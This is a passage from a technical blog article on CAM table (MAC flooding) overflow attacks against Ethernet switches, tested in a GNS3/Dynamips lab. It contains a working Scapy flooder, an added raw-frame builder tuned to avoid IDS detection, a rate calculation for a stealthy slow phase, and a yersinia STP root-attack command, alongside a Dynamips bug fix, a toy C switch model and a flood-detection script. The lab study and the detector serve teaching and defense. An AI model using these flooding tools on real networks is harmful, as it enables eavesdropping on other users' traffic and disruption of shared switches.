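    out["router_to_server"] = sw.frame(2, 1, ROUTER, SERVER)    # known dst: unicast {2}
    out["laptop_to_router"] = sw.frame(3, 4, LAPTOP, ROUTER)    # laptop wakes up on port 4
    out["laptop_learned"] = LAPTOP in sw.table                  # no free slot: False
    out["router_to_laptop"] = sw.frame(4, 1, ROUTER, LAPTOP)    # unknown dst: flooded
    out["learn_failures"] = sw.learn_failures
    sw.frame(20, 1, ROUTER, SERVER)     # the legitimate pair keeps talking...
    sw.frame(20, 2, SERVER, ROUTER)
    # ...but nobody refreshes the bogus entries: after the passes at 15 s and 30 s
    # they are gone, the laptop gets its slot and the one-sided flooding stops.
    out["laptop_to_router_later"] = sw.frame(31, 4, LAPTOP, ROUTER)
    out["laptop_learned_later"] = LAPTOP in sw.table
    out["router_to_laptop_later"] = sw.frame(32, 1, ROUTER, LAPTOP)
    return out


if __name__ == "__main__":
    print("sent once at 0 s, still there at 29 s:", address_survives([0], 29))
    print("sent once at 0 s, still there at 30 s:", address_survives([0], 30))
    print("sent every 14 s, still there at 59 s:", address_survives(range(0, 60, 14), 59))
    for key, value in full_table_behaviour().items():
        print(key, value)
```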
<p>The main consequences of this are:</p>
<ul>
<li>
<p>Despite what is often told, <span class="caps">CAM</span> overflow attacks are not a magical way to
turn switches into hubs.
You will <em>not</em> be forwarded all the traffic passing through the switch.</p>
</li>
<li>
<p>You will <em>not</em> be able to eavesdrop on any already active communication (i.e.
any communication initiated before the <span class="caps">MAC</span> flood started). The devices’ <span class="caps">MAC</span>
addresses will already be known to the switch and legitimate packets will
regularly reset the switch’s aging counters.
No matter how hard you flood it, these devices’ <span class="caps">MAC</span> addresses will stay in
the switch’s <span class="caps">CAM</span> table and the switch will only forward the traffic to the
appropriate ports.</p>
</li>
<li>
<p>You will most likely be able to eavesdrop on <em>only</em> one side of a communication:
from the router to previously inactive devices (shut down or in sleep mode
for instance).
In real world scenarios, at least during business hours the switch will
nearly permanently have the router’s <span class="caps">MAC</span> address in its <span class="caps">CAM</span> table since
almost any traffic on the network will pass through it and, therefore,
constantly refresh the aging timer.
The main goal of the <span class="caps">MAC</span> flood will therefore be to keep previously
inactive devices from successfully registering their <span class="caps">MAC</span> address on the switch too.</p>
<p>To give a concrete example of the result, chances are that you will
not be able to eavesdrop on the user’s password and requests, but you may be
able to get the session identifiers and data provided by the server.</p>
</li>
<li>
<p>But to end with depressing news, what you <em>will</em> achieve, if you
take care not to overload the switches, is that they will happily forward your
flooding packets from switch to switch until they contaminate the whole
Layer 2 <span class="caps">LAN</span>.
Only <span class="caps">VLAN</span> pruning or a Layer 3 device on the way may limit this
dissemination; without them, even switches serving only ports of unrelated VLANs
will see their <span class="caps">CAM</span> table being filled up.</p>
<p>In other words, depending on the topology details, launching the attack from
<span class="caps">VLAN</span> 2 can allow you to access <span class="caps">VLAN</span> 2 traffic forwarded from several
switches away and can also affect the behavior of <span class="caps">VLAN</span> 3 switches.</p>
</li>
</ul>
<h3 id="using-the-right-tool"><a class="toclink" href="#using-the-right-tool">Using the right tool</a></h3>
<p>The tool classically recommended for <span class="caps">CAM</span> table overflow attacks is <code>macof</code>
(from the <a href="https://www.monkey.org/~dugsong/dsniff/" rel="external">dsniff</a> project, unmaintained for years).
However, this tool strikes me as a primitive barbarian from some
fantasy story: brutal, inefficient and unreliable.</p>
<p>This tool generates packets using fully random <span class="caps">MAC</span> addresses generated on the
fly.
This is wrong for two reasons:</p>
<ul>
<li>
<p>As we saw above, all inactive <span class="caps">MAC</span> addresses are automatically deleted
from the <span class="caps">CAM</span> table, temporarily freeing a large number of slots available
to record genuine <span class="caps">MAC</span> addresses until we manage to fill the table again
(which may take some time if the target is several switches away).
And as we also saw, a single genuine packet is sufficient to update the <span class="caps">CAM</span>
table with true information and put a definitive end to our eavesdropping
on this particular target.</p>
</li>
<li>
<p>Statistically half of the randomly generated MACs have the
<a href="https://en.wikipedia.org/wiki/MAC_address#Address_details" rel="external">I/G group bit</a> set.
However, it is forbidden to use a group <span class="caps">MAC</span> address as sender, as stated in
<a href="http://standards.ieee.org/about/get/802/802.3.html" rel="external"><span class="caps">IEEE</span> 802.3-2002, Section 3.2.3(b)</a>:</p>
<blockquote>
<p>In the Source Address field, the first bit is reserved and set to 0.</p>
</blockquote>
<p>Cisco switches (and probably others) are aware of that, and consider such
packets as malformed and drop them.
This means that half of the packets generated by <code>macof</code> are dropped by the
first switch they encounter.</p>
</li>
</ul>
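Added example (not from the post or from dsniff): the same two facts seen from the monitoring side. A span-port or <span class="caps">NIDS</span> sensor can flag frames whose source address has the I/G bit set (invalid under <span class="caps">IEEE</span> 802.3 3.2.3(b), and what a purely random generator produces half the time) and count how many never-seen source MACs a port introduces inside one 15-second ager period, which is the footprint of a flood that has to keep tables filled. The 15-second window, the 50-MAC threshold, the port numbers and the frame records are constructed assumptions, to be tuned for a real site.

```python
from collections import defaultdict, deque


def is_group_address(mac):
    """True when the I/G bit (least significant bit of the first octet) is set."""
    return int(mac.split(":")[0], 16) & 0x01 == 1


class MacFloodDetector:
    """Flag malformed source addresses and bursts of new source MACs on one port.

    `window` follows the 15-second ager period discussed in the post; `threshold`
    (50 new MACs per window per port) is an assumed value, not a vendor default."""

    def __init__(self, window=15.0, threshold=50):
        self.window = window
        self.threshold = threshold
        self.known = set()                  # (port, mac) pairs already seen
        self.recent = defaultdict(deque)    # port -> timestamps of recently learned MACs
        self.alerts = []

    def observe(self, ts, port, src):
        if is_group_address(src):
            # A group address in the Source Address field violates IEEE 802.3 3.2.3(b).
            self.alerts.append(("malformed_source", port, src))
            return
        if (port, src) in self.known:
            return                          # nothing new learned from this frame
        self.known.add((port, src))
        recent = self.recent[port]
        recent.append(ts)
        while recent and ts - recent[0] > self.window:
            recent.popleft()                # slide the window
        if len(recent) == self.threshold:   # fire once when the threshold is crossed
            self.alerts.append(("mac_flood", port, len(recent)))


def build_sample_records():
    """Constructed (timestamp, port, src_mac) records: two quiet hosts plus a flood."""
    records = []
    for t in range(20):                     # two hosts talking once a second on ports 1 and 2
        records.append((float(t), 1, "02:00:00:00:00:01"))
        records.append((float(t), 2, "02:00:00:00:00:02"))
    for i in range(60):                     # 60 distinct unicast sources on port 3 within 6 s
        records.append((10.0 + i * 0.1, 3, "02:00:00:00:01:%02x" % i))
    for i in range(5):                      # sources with the I/G bit set, as random MACs give
        records.append((11.0 + i, 3, "03:00:00:00:02:%02x" % i))
    return sorted(records)


def run_detector(records, **kwargs):
    """Feed the records to a detector and summarise its alerts per type."""
    det = MacFloodDetector(**kwargs)
    for ts, port, src in records:
        det.observe(ts, port, src)
    summary = {"malformed_source": 0, "mac_flood": []}
    for kind, port, detail in det.alerts:
        if kind == "malformed_source":
            summary["malformed_source"] += 1
        else:
            summary["mac_flood"].append((port, detail))
    return summary


if __name__ == "__main__":
    print(run_detector(build_sample_records()))
    # {'malformed_source': 5, 'mac_flood': [(3, 50)]}
```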
<p><code>macof</code> also relies on some brute-force strategy by sending its malicious
packets as fast as the attacker’s device and the network allows.</p>
<p>This causes several issues:</p>
<ul>
<li>
<p>Switches may malfunction or even crash during the flooding process (several
reports state that the switch’s management plane was frozen during such flooding).</p>
</li>
<li>
<p>Due to the load caused on the switch side, these packets may not be reliably
relayed from switch to switch, causing only the first attacker-facing switch to
have its <span class="caps">CAM</span> table effectively overflowed.</p>
</li>
<li>
<p>Due to the load on the attacker’s side, either the network card is fully
congested or the <span class="caps">CPU</span> usage maxes out. In all cases it is impossible to
capture any traffic from the same device, which is sad since capturing
traffic is precisely the goal of this attack. The usual advice is to stop
flooding when capturing, and to alternate between flooding and capturing on a
regular basis (every minute for instance, given the 5 minute default aging
on real gear; with Dynamips’ 30 seconds it becomes just hopeless).
I would also advise having enough luck to be indeed capturing when
interesting information is being exchanged, and enough luck to be able to
properly counter the periodic <span class="caps">MAC</span> table cleaning, which seems pretty
unfeasible in such conditions.</p>
</li>
</ul>
<p>A good <span class="caps">CAM</span> overflow attack tool should:</p>
<ul>
<li>Not use more resources than necessary, in order to allow reliable eavesdropping.</li>
<li>Generate well-formed packets (i.e. no useless packets which will get
dropped anyway, and no packets which will make Wireshark (or an <span class="caps">IDS</span>…) complain).</li>
<li>Ensure that the <span class="caps">CAM</span> tables remain constantly filled so new devices will
have no chance to register their <span class="caps">MAC</span> address.</li>
</ul>
<p><code>macof</code> fails on these three requirements and is therefore not a suitable tool.
A quick search did not reveal any relevant alternative, so I went the
<a href="http://www.secdev.org/projects/scapy/" rel="external">Scapy</a> route (Scapy is a Python library and interactive tool which allows you to
freely build and manipulate network packets).</p>
<p>Here is the code I used to successfully test <span class="caps">CAM</span> table overflow in a <span class="caps">GNS3</span> environment:</p>
<div class="codehilite"><pre>#! /usr/bin/python
# CAM table overflow flooder built on Scapy. sendpfast() hands the packets
# over to tcpreplay, which must be installed; sending raw frames needs root.
nbpkts = 8192   # number of distinct fake MACs, enough to fill a 8192-entry CAM table
iface = "eth0"

from scapy.all import sendpfast, Ether, IP, RandIP, RandMAC, TCP

print("Initializing...")
# We first build all packets...
pkts = []
for i in range(nbpkts):
    macaddr = str(RandMAC())
    # Quick-and-dirty way to ensure that the I/G bit remains unset: zero the
    # low nibble of the first octet (this clears the U/L bit as well).
    macaddr = macaddr[:1] + "0" + macaddr[2:]
    # This packet structure mimics a TCP SYN sent to a HTTP server.
    # A random dst MAC should also work; a fixed one is useful to easily
    # filter out flood-related packets when capturing traffic.
    # You can use IPs valid for your range, but be cautious that if any
    # host is made to send some RST for instance, its MAC address will be
    # registered by the switches.
    pkts.append(Ether(src=macaddr, dst="ff:ff:ff:ff:ff:ff")/
                IP(src=str(RandIP()), dst=str(RandIP()))/
                TCP(dport=80, flags="S", options=[('Timestamp', (0, 0))]))

print("Launching attack, press Ctrl+C to stop...")
# ...and then we send them in a loop.
try:
    while True:
        # Adapt pps (packets per second) to your needs. Running a complex
        # GNS3 topology on a low-end machine will take all the CPU, causing
        # packet loss; pps will then need to be high to replay lost packets.
        # Given enough CPU, packet loss can remain low and pps can be
        # lowered too.
        sendpfast(pkts, iface=iface, file_cache=True, pps=5000, loop=999)
except KeyboardInterrupt:
    print("Stopped.")
</pre></div>
<p>This is a quick-and-dirty, few-line example which could be improved in
several ways.
For instance, if it were used against real gear it may make sense to use two
successive sending phases, the first one being quick in order to rapidly
take over the <span class="caps">CAM</span> tables, and the second one working at a far slower pace,
taking full advantage of the 5 minutes aging delay to stay below the radar as
much as possible (when this default delay is changed, it is generally
raised rather than lowered, and moreover I have some doubts that someone who does
not take care of enabling port security on their switches will really bother
changing this kind of setting).</p>
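<p>As an added example (this is not code from the original article), here is a Python 3 script that builds the same kind of TCP SYN frame without Scapy and checks, field by field, what the list above asks of a good flooder: a unicast source <span class="caps">MAC</span> (the I/G bit is cleared with a proper mask rather than by zeroing the whole nibble, and the U/L bit is set to mark the address as locally administered; both are my choices), valid IPv4 and <span class="caps">TCP</span> checksums, and the right EtherType. <code>refresh_rate()</code> turns the slow-phase idea just discussed into a number: the sending rate needed to keep every fake entry alive given the table size and the aging timer. The addresses are documentation-range values constructed for the demonstration, and the 2× safety margin in <code>refresh_rate()</code> is an assumption.</p>

```python
import random
import struct

# Constructed addresses for the demonstration (documentation ranges, not a real
# target). The fixed broadcast destination mirrors the Scapy script above and
# makes flood frames trivial to filter out of a capture.
DST_MAC = "ff:ff:ff:ff:ff:ff"
DST_IP = "198.51.100.20"


def is_group_mac(mac):
    """True when the I/G bit (least significant bit of the first octet) is set."""
    return bool(int(mac.split(":")[0], 16) & 0x01)


def random_unicast_mac(rng=random):
    """Random source MAC with the I/G bit cleared, so the first switch will not
    discard the frame as malformed, and the U/L bit set (locally administered)."""
    octets = [rng.randrange(256) for _ in range(6)]
    octets[0] = (octets[0] & 0xFE) | 0x02
    return ":".join("%02x" % o for o in octets)


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def ones_complement_sum(data):
    """16-bit one's complement sum with end-around carry (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def checksum(data):
    return (~ones_complement_sum(data)) & 0xFFFF


def build_syn_frame(src_mac, dst_mac, src_ip, dst_ip, sport, dport, seq=0):
    """Ethernet II / IPv4 / TCP SYN with a Timestamp option and valid checksums."""
    # NOP, NOP, Timestamp (kind 8, length 10, TSval 0, TSecr 0): 12 bytes, so
    # the TCP header stays a multiple of 4 bytes (data offset 8).
    options = b"\x01\x01\x08\x0a" + struct.pack("!II", 0, 0)
    offset = (20 + len(options)) // 4
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, offset << 4,
                      0x02, 65535, 0, 0) + options
    pseudo = ip_bytes(src_ip) + ip_bytes(dst_ip) + struct.pack("!BBH", 0, 6, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, 6,
                     0, ip_bytes(src_ip), ip_bytes(dst_ip))
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return mac_bytes(dst_mac) + mac_bytes(src_mac) + b"\x08\x00" + ip + tcp


def verify_frame(frame):
    """Sanity checks: the unicast-source test is the one a switch applies, the
    others are what Wireshark or an IDS would complain about."""
    eth = frame[:14]
    ihl = (frame[14] & 0x0F) * 4
    ip = frame[14:14 + ihl]
    total_len = struct.unpack("!H", ip[2:4])[0]
    tcp = frame[14 + ihl:14 + total_len]
    pseudo = ip[12:20] + struct.pack("!BBH", 0, ip[9], len(tcp))
    src_mac = ":".join("%02x" % b for b in eth[6:12])
    return {
        "unicast_src": not is_group_mac(src_mac),
        "ethertype_ipv4": eth[12:14] == b"\x08\x00",
        "ip_csum_ok": ones_complement_sum(ip) == 0xFFFF,
        "tcp_csum_ok": ones_complement_sum(pseudo + tcp) == 0xFFFF,
        "syn_only": tcp[13] == 0x02,
    }


def build_flood(n, seed=None):
    """n SYN frames, each from a fresh random unicast MAC and random source IP."""
    rng = random.Random(seed)
    frames = []
    for _ in range(n):
        src_ip = "10.%d.%d.%d" % (rng.randrange(256), rng.randrange(256),
                                  rng.randrange(1, 255))
        frames.append(build_syn_frame(random_unicast_mac(rng), DST_MAC, src_ip,
                                      DST_IP, rng.randrange(1024, 65536), 80))
    return frames


def refresh_rate(table_entries, aging_seconds, margin=2.0):
    """Packets per second the slow phase needs: every fake MAC must be seen
    again before its aging timer expires; margin absorbs loss and jitter."""
    return margin * table_entries / float(aging_seconds)
```

<p>With 8192 entries and the 5 minutes default aging, <code>refresh_rate(8192, 300)</code> gives about 55 packets per second, roughly a hundred times lower than the 5000 pps of the Scapy script and easily sustained by a machine that is capturing at the same time. The frames returned by <code>build_flood()</code> are raw bytes: they can be written to a pcap and replayed with <code>tcpreplay</code>, or sent through an <code>AF_PACKET</code> raw socket on Linux.</p>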
<h3 id="correct-a-bug-currently-affecting-dynamips"><a class="toclink" href="#correct-a-bug-currently-affecting-dynamips">Correct a bug currently affecting dynamips</a></h3>
<p>Sadly, when you are through all this, you will discover that once their <span class="caps">CAM</span>
table is properly filled, the switches in <span class="caps">GNS3</span> will not start flooding packets
out of “all” their ports, but will drop them instead.</p>
<p>This is due to a bug affecting the <code>bcm5600_handle_rx_pkt()</code> function in charge
of handling received packets and located around line 2170 of the
<a href="https://github.com/GNS3/dynamips/blob/master/common/dev_nm_16esw.c" rel="external">dev_nm_16esw.c</a> file:</p>
<div class="codehilite"><pre><span class="cm">/* Source MAC address learning */</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">bcm5600_src_mac_learning</span><span class="p">(</span><span class="n">d</span><span class="p">,</span><span class="n">p</span><span class="p">))</span>
<span class="k">return</span><span class="p">(</span><span class="n">FALSE</span><span class="p">);</span>
</pre></div>
<p>Currently, when the <span class="caps">ARL</span> fails to store a new <span class="caps">MAC</span> address, the handling of the
incoming packet is aborted, effectively resulting in it being dropped.
The fix is simply to ignore the <span class="caps">ARL</span> status and continue processing the packet
anyway, since this is what real gear actually does:</p>
<div class="codehilite"><pre><span class="cm">/* Source MAC address learning */</span>
<span class="n">bcm5600_src_mac_learning</span><span class="p">(</span><span class="n">d</span><span class="p">,</span><span class="n">p</span><span class="p">);</span>
</pre></div>
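<p>To make the difference between the two receive paths concrete, here is an added example which is not dynamips code: a toy C model of a switch <span class="caps">CAM</span> table with both variants side by side. <code>handle_rx_buggy()</code> mirrors the early return quoted above and <code>handle_rx_fixed()</code> the corrected version; the table size, port numbers and <span class="caps">MAC</span> addresses are made up for the demonstration, and the frame is reduced to a (source, destination, ingress port) triple. The scenario fills the table from an attacker port and then lets a victim whose <span class="caps">MAC</span> can no longer be learned talk to a server that was learned before the flood.</p>

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CAM_SIZE   4     /* toy table; a real switch holds thousands of entries */
#define PORT_DROP  (-1)
#define PORT_FLOOD (-2)  /* unknown unicast: copy to every port except the ingress */

typedef struct { uint8_t b[6]; } mac_t;
typedef struct { bool used; mac_t mac; int port; } cam_entry_t;
typedef struct { cam_entry_t e[CAM_SIZE]; } cam_t;

/* 02:00:00:00:00:nn, a locally administered unicast address made up for the demo. */
static mac_t mac_n(uint8_t n) { mac_t m = {{0x02, 0, 0, 0, 0, n}}; return m; }
static bool mac_eq(const mac_t *a, const mac_t *b) { return memcmp(a->b, b->b, 6) == 0; }

static int cam_lookup(const cam_t *t, const mac_t *m) {
    for (int i = 0; i < CAM_SIZE; i++)
        if (t->e[i].used && mac_eq(&t->e[i].mac, m))
            return t->e[i].port;
    return -1;
}

/* Source MAC learning. Returns false when the address is new and no slot is
   free: the ARL failure a CAM overflow provokes for every genuine host. */
static bool cam_learn(cam_t *t, const mac_t *m, int port) {
    for (int i = 0; i < CAM_SIZE; i++)
        if (t->e[i].used && mac_eq(&t->e[i].mac, m)) {
            t->e[i].port = port;            /* refresh an existing entry */
            return true;
        }
    for (int i = 0; i < CAM_SIZE; i++)
        if (!t->e[i].used) {
            t->e[i].used = true;
            t->e[i].mac = *m;
            t->e[i].port = port;
            return true;
        }
    return false;
}

static int cam_forward(const cam_t *t, const mac_t *dst, int in_port) {
    int out = cam_lookup(t, dst);
    if (out < 0)        return PORT_FLOOD;
    if (out == in_port) return PORT_DROP;   /* destination is on the ingress segment */
    return out;
}

/* Behaviour the article describes in dynamips: a failed learn drops the frame. */
static int handle_rx_buggy(cam_t *t, const mac_t *src, const mac_t *dst, int in_port) {
    if (!cam_learn(t, src, in_port))
        return PORT_DROP;
    return cam_forward(t, dst, in_port);
}

/* Real-switch behaviour: learning is best effort, forwarding goes on regardless. */
static int handle_rx_fixed(cam_t *t, const mac_t *src, const mac_t *dst, int in_port) {
    (void)cam_learn(t, src, in_port);
    return cam_forward(t, dst, in_port);
}

/* Flood the table from the attacker's port; returns how many fake MACs fitted. */
static int cam_fill(cam_t *t, int port, int count) {
    int learned = 0;
    for (int i = 0; i < count; i++) {
        mac_t fake = mac_n((uint8_t)(0x80 + i));
        if (cam_learn(t, &fake, port))
            learned++;
    }
    return learned;
}

/* A switch that already knows the server on port 2 is flooded from port 0.
   Returns the decision for the victim's frame (port 1, to the server) or,
   with reply set, for the server's answer to the victim afterwards. */
static int run_scenario(bool use_fix, bool reply) {
    cam_t t;
    mac_t victim = mac_n(1), server = mac_n(2);
    int (*rx)(cam_t *, const mac_t *, const mac_t *, int) =
        use_fix ? handle_rx_fixed : handle_rx_buggy;

    memset(&t, 0, sizeof t);
    cam_learn(&t, &server, 2);
    cam_fill(&t, 0, 2 * CAM_SIZE);
    int decision = rx(&t, &victim, &server, 1);
    if (reply)
        decision = rx(&t, &server, &victim, 2);
    return decision;
}

int main(void) {
    printf("victim to server  buggy: %d  fixed: %d\n",
           run_scenario(false, false), run_scenario(true, false));
    printf("server to victim  buggy: %d  fixed: %d\n",
           run_scenario(false, true), run_scenario(true, true));
    return 0;
}
```

<p>On the buggy path the victim’s frame is dropped outright, which breaks its connectivity and makes the attack very noticeable; on the fixed path the frame reaches the server on port 2, and because the victim never made it into the table the server’s answer is flooded to every port, including the attacker’s, which is exactly the eavesdropping condition the attack is after.</p>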
<p>I’ve raised <a href="https://github.com/GNS3/dynamips/issues/72" rel="external">this issue</a> with the <span class="caps">GNS3</span> team so it can be fixed in future <span class="caps">GNS3</span>
updates.
I also advocated <a href="https://github.com/GNS3/dynamips/issues/39" rel="external">raising the <span class="caps">MAC</span> table garbage collection timeout</a> from
the current 15 seconds to 5 minutes in order to be closer to real gear behavior.</p>
<p>Until this gets fixed upstream, it requires a manual modification and
recompilation of the Dynamips source code, but this is a very quick and simple
process (there is no need to recompile the whole of <span class="caps">GNS3</span>, only the <code>dynamips</code>
binary, and I provided the patches in the tickets linked above).</p>
<h3 id="final-notes"><a class="toclink" href="#final-notes">Final notes</a></h3>
<p>After you do that, you will be able to test and repeat <span class="caps">MAC</span> overflow attacks in
<span class="caps">GNS3</span> with router-based switches in a stable and predictable manner.</p>
<p>Here are two final notes:</p>
<ul>
<li>
<p>While router-based switches allow testing <span class="caps">CAM</span> overflow attacks, they will
not allow testing proper mitigation techniques as they do not implement
port security.
I think this is a limitation of <span class="caps">IOS</span> rather than <span class="caps">GNS3</span> since the relevant
options are not even present in the shell.
<a href="http://evilrouters.net/cisco-iou-faq" rel="external"><span class="caps">IOU</span></a> proposes these options; however, due to its <span class="caps">CAM</span> table allowing
nearly 200 million entries (compared to the 8192 of a real <span class="caps">IOS</span>), it seems
out of reach for a traditional <span class="caps">CAM</span> overflow attack. So <span class="caps">IOU</span> is the
opposite of router-based switches: it can be used to test mitigation
techniques but not to reproduce the attack. Be aware also that the <span class="caps">IOU</span>
implementation of the Spanning Tree Protocol (<span class="caps">STP</span>) is heavily buggy and
topology loops must be avoided.</p>
</li>
<li>
<p>Speaking of <span class="caps">STP</span>, and depending on the topology, becoming the <span class="caps">STP</span> root
(<code>yersinia stp -attack 4</code>) should induce a clearing of most <span class="caps">MAC</span> table
dynamic entries due to the topology change, and may provide you with a more
efficient flooding and eavesdropping experience ;).</p>
</li>
</ul>
<hr/>
<p class="footnote">Article based on a <a href="https://networkengineering.stackexchange.com/q/20313/27387#32567" rel="external">StackExchange answer</a>.</p>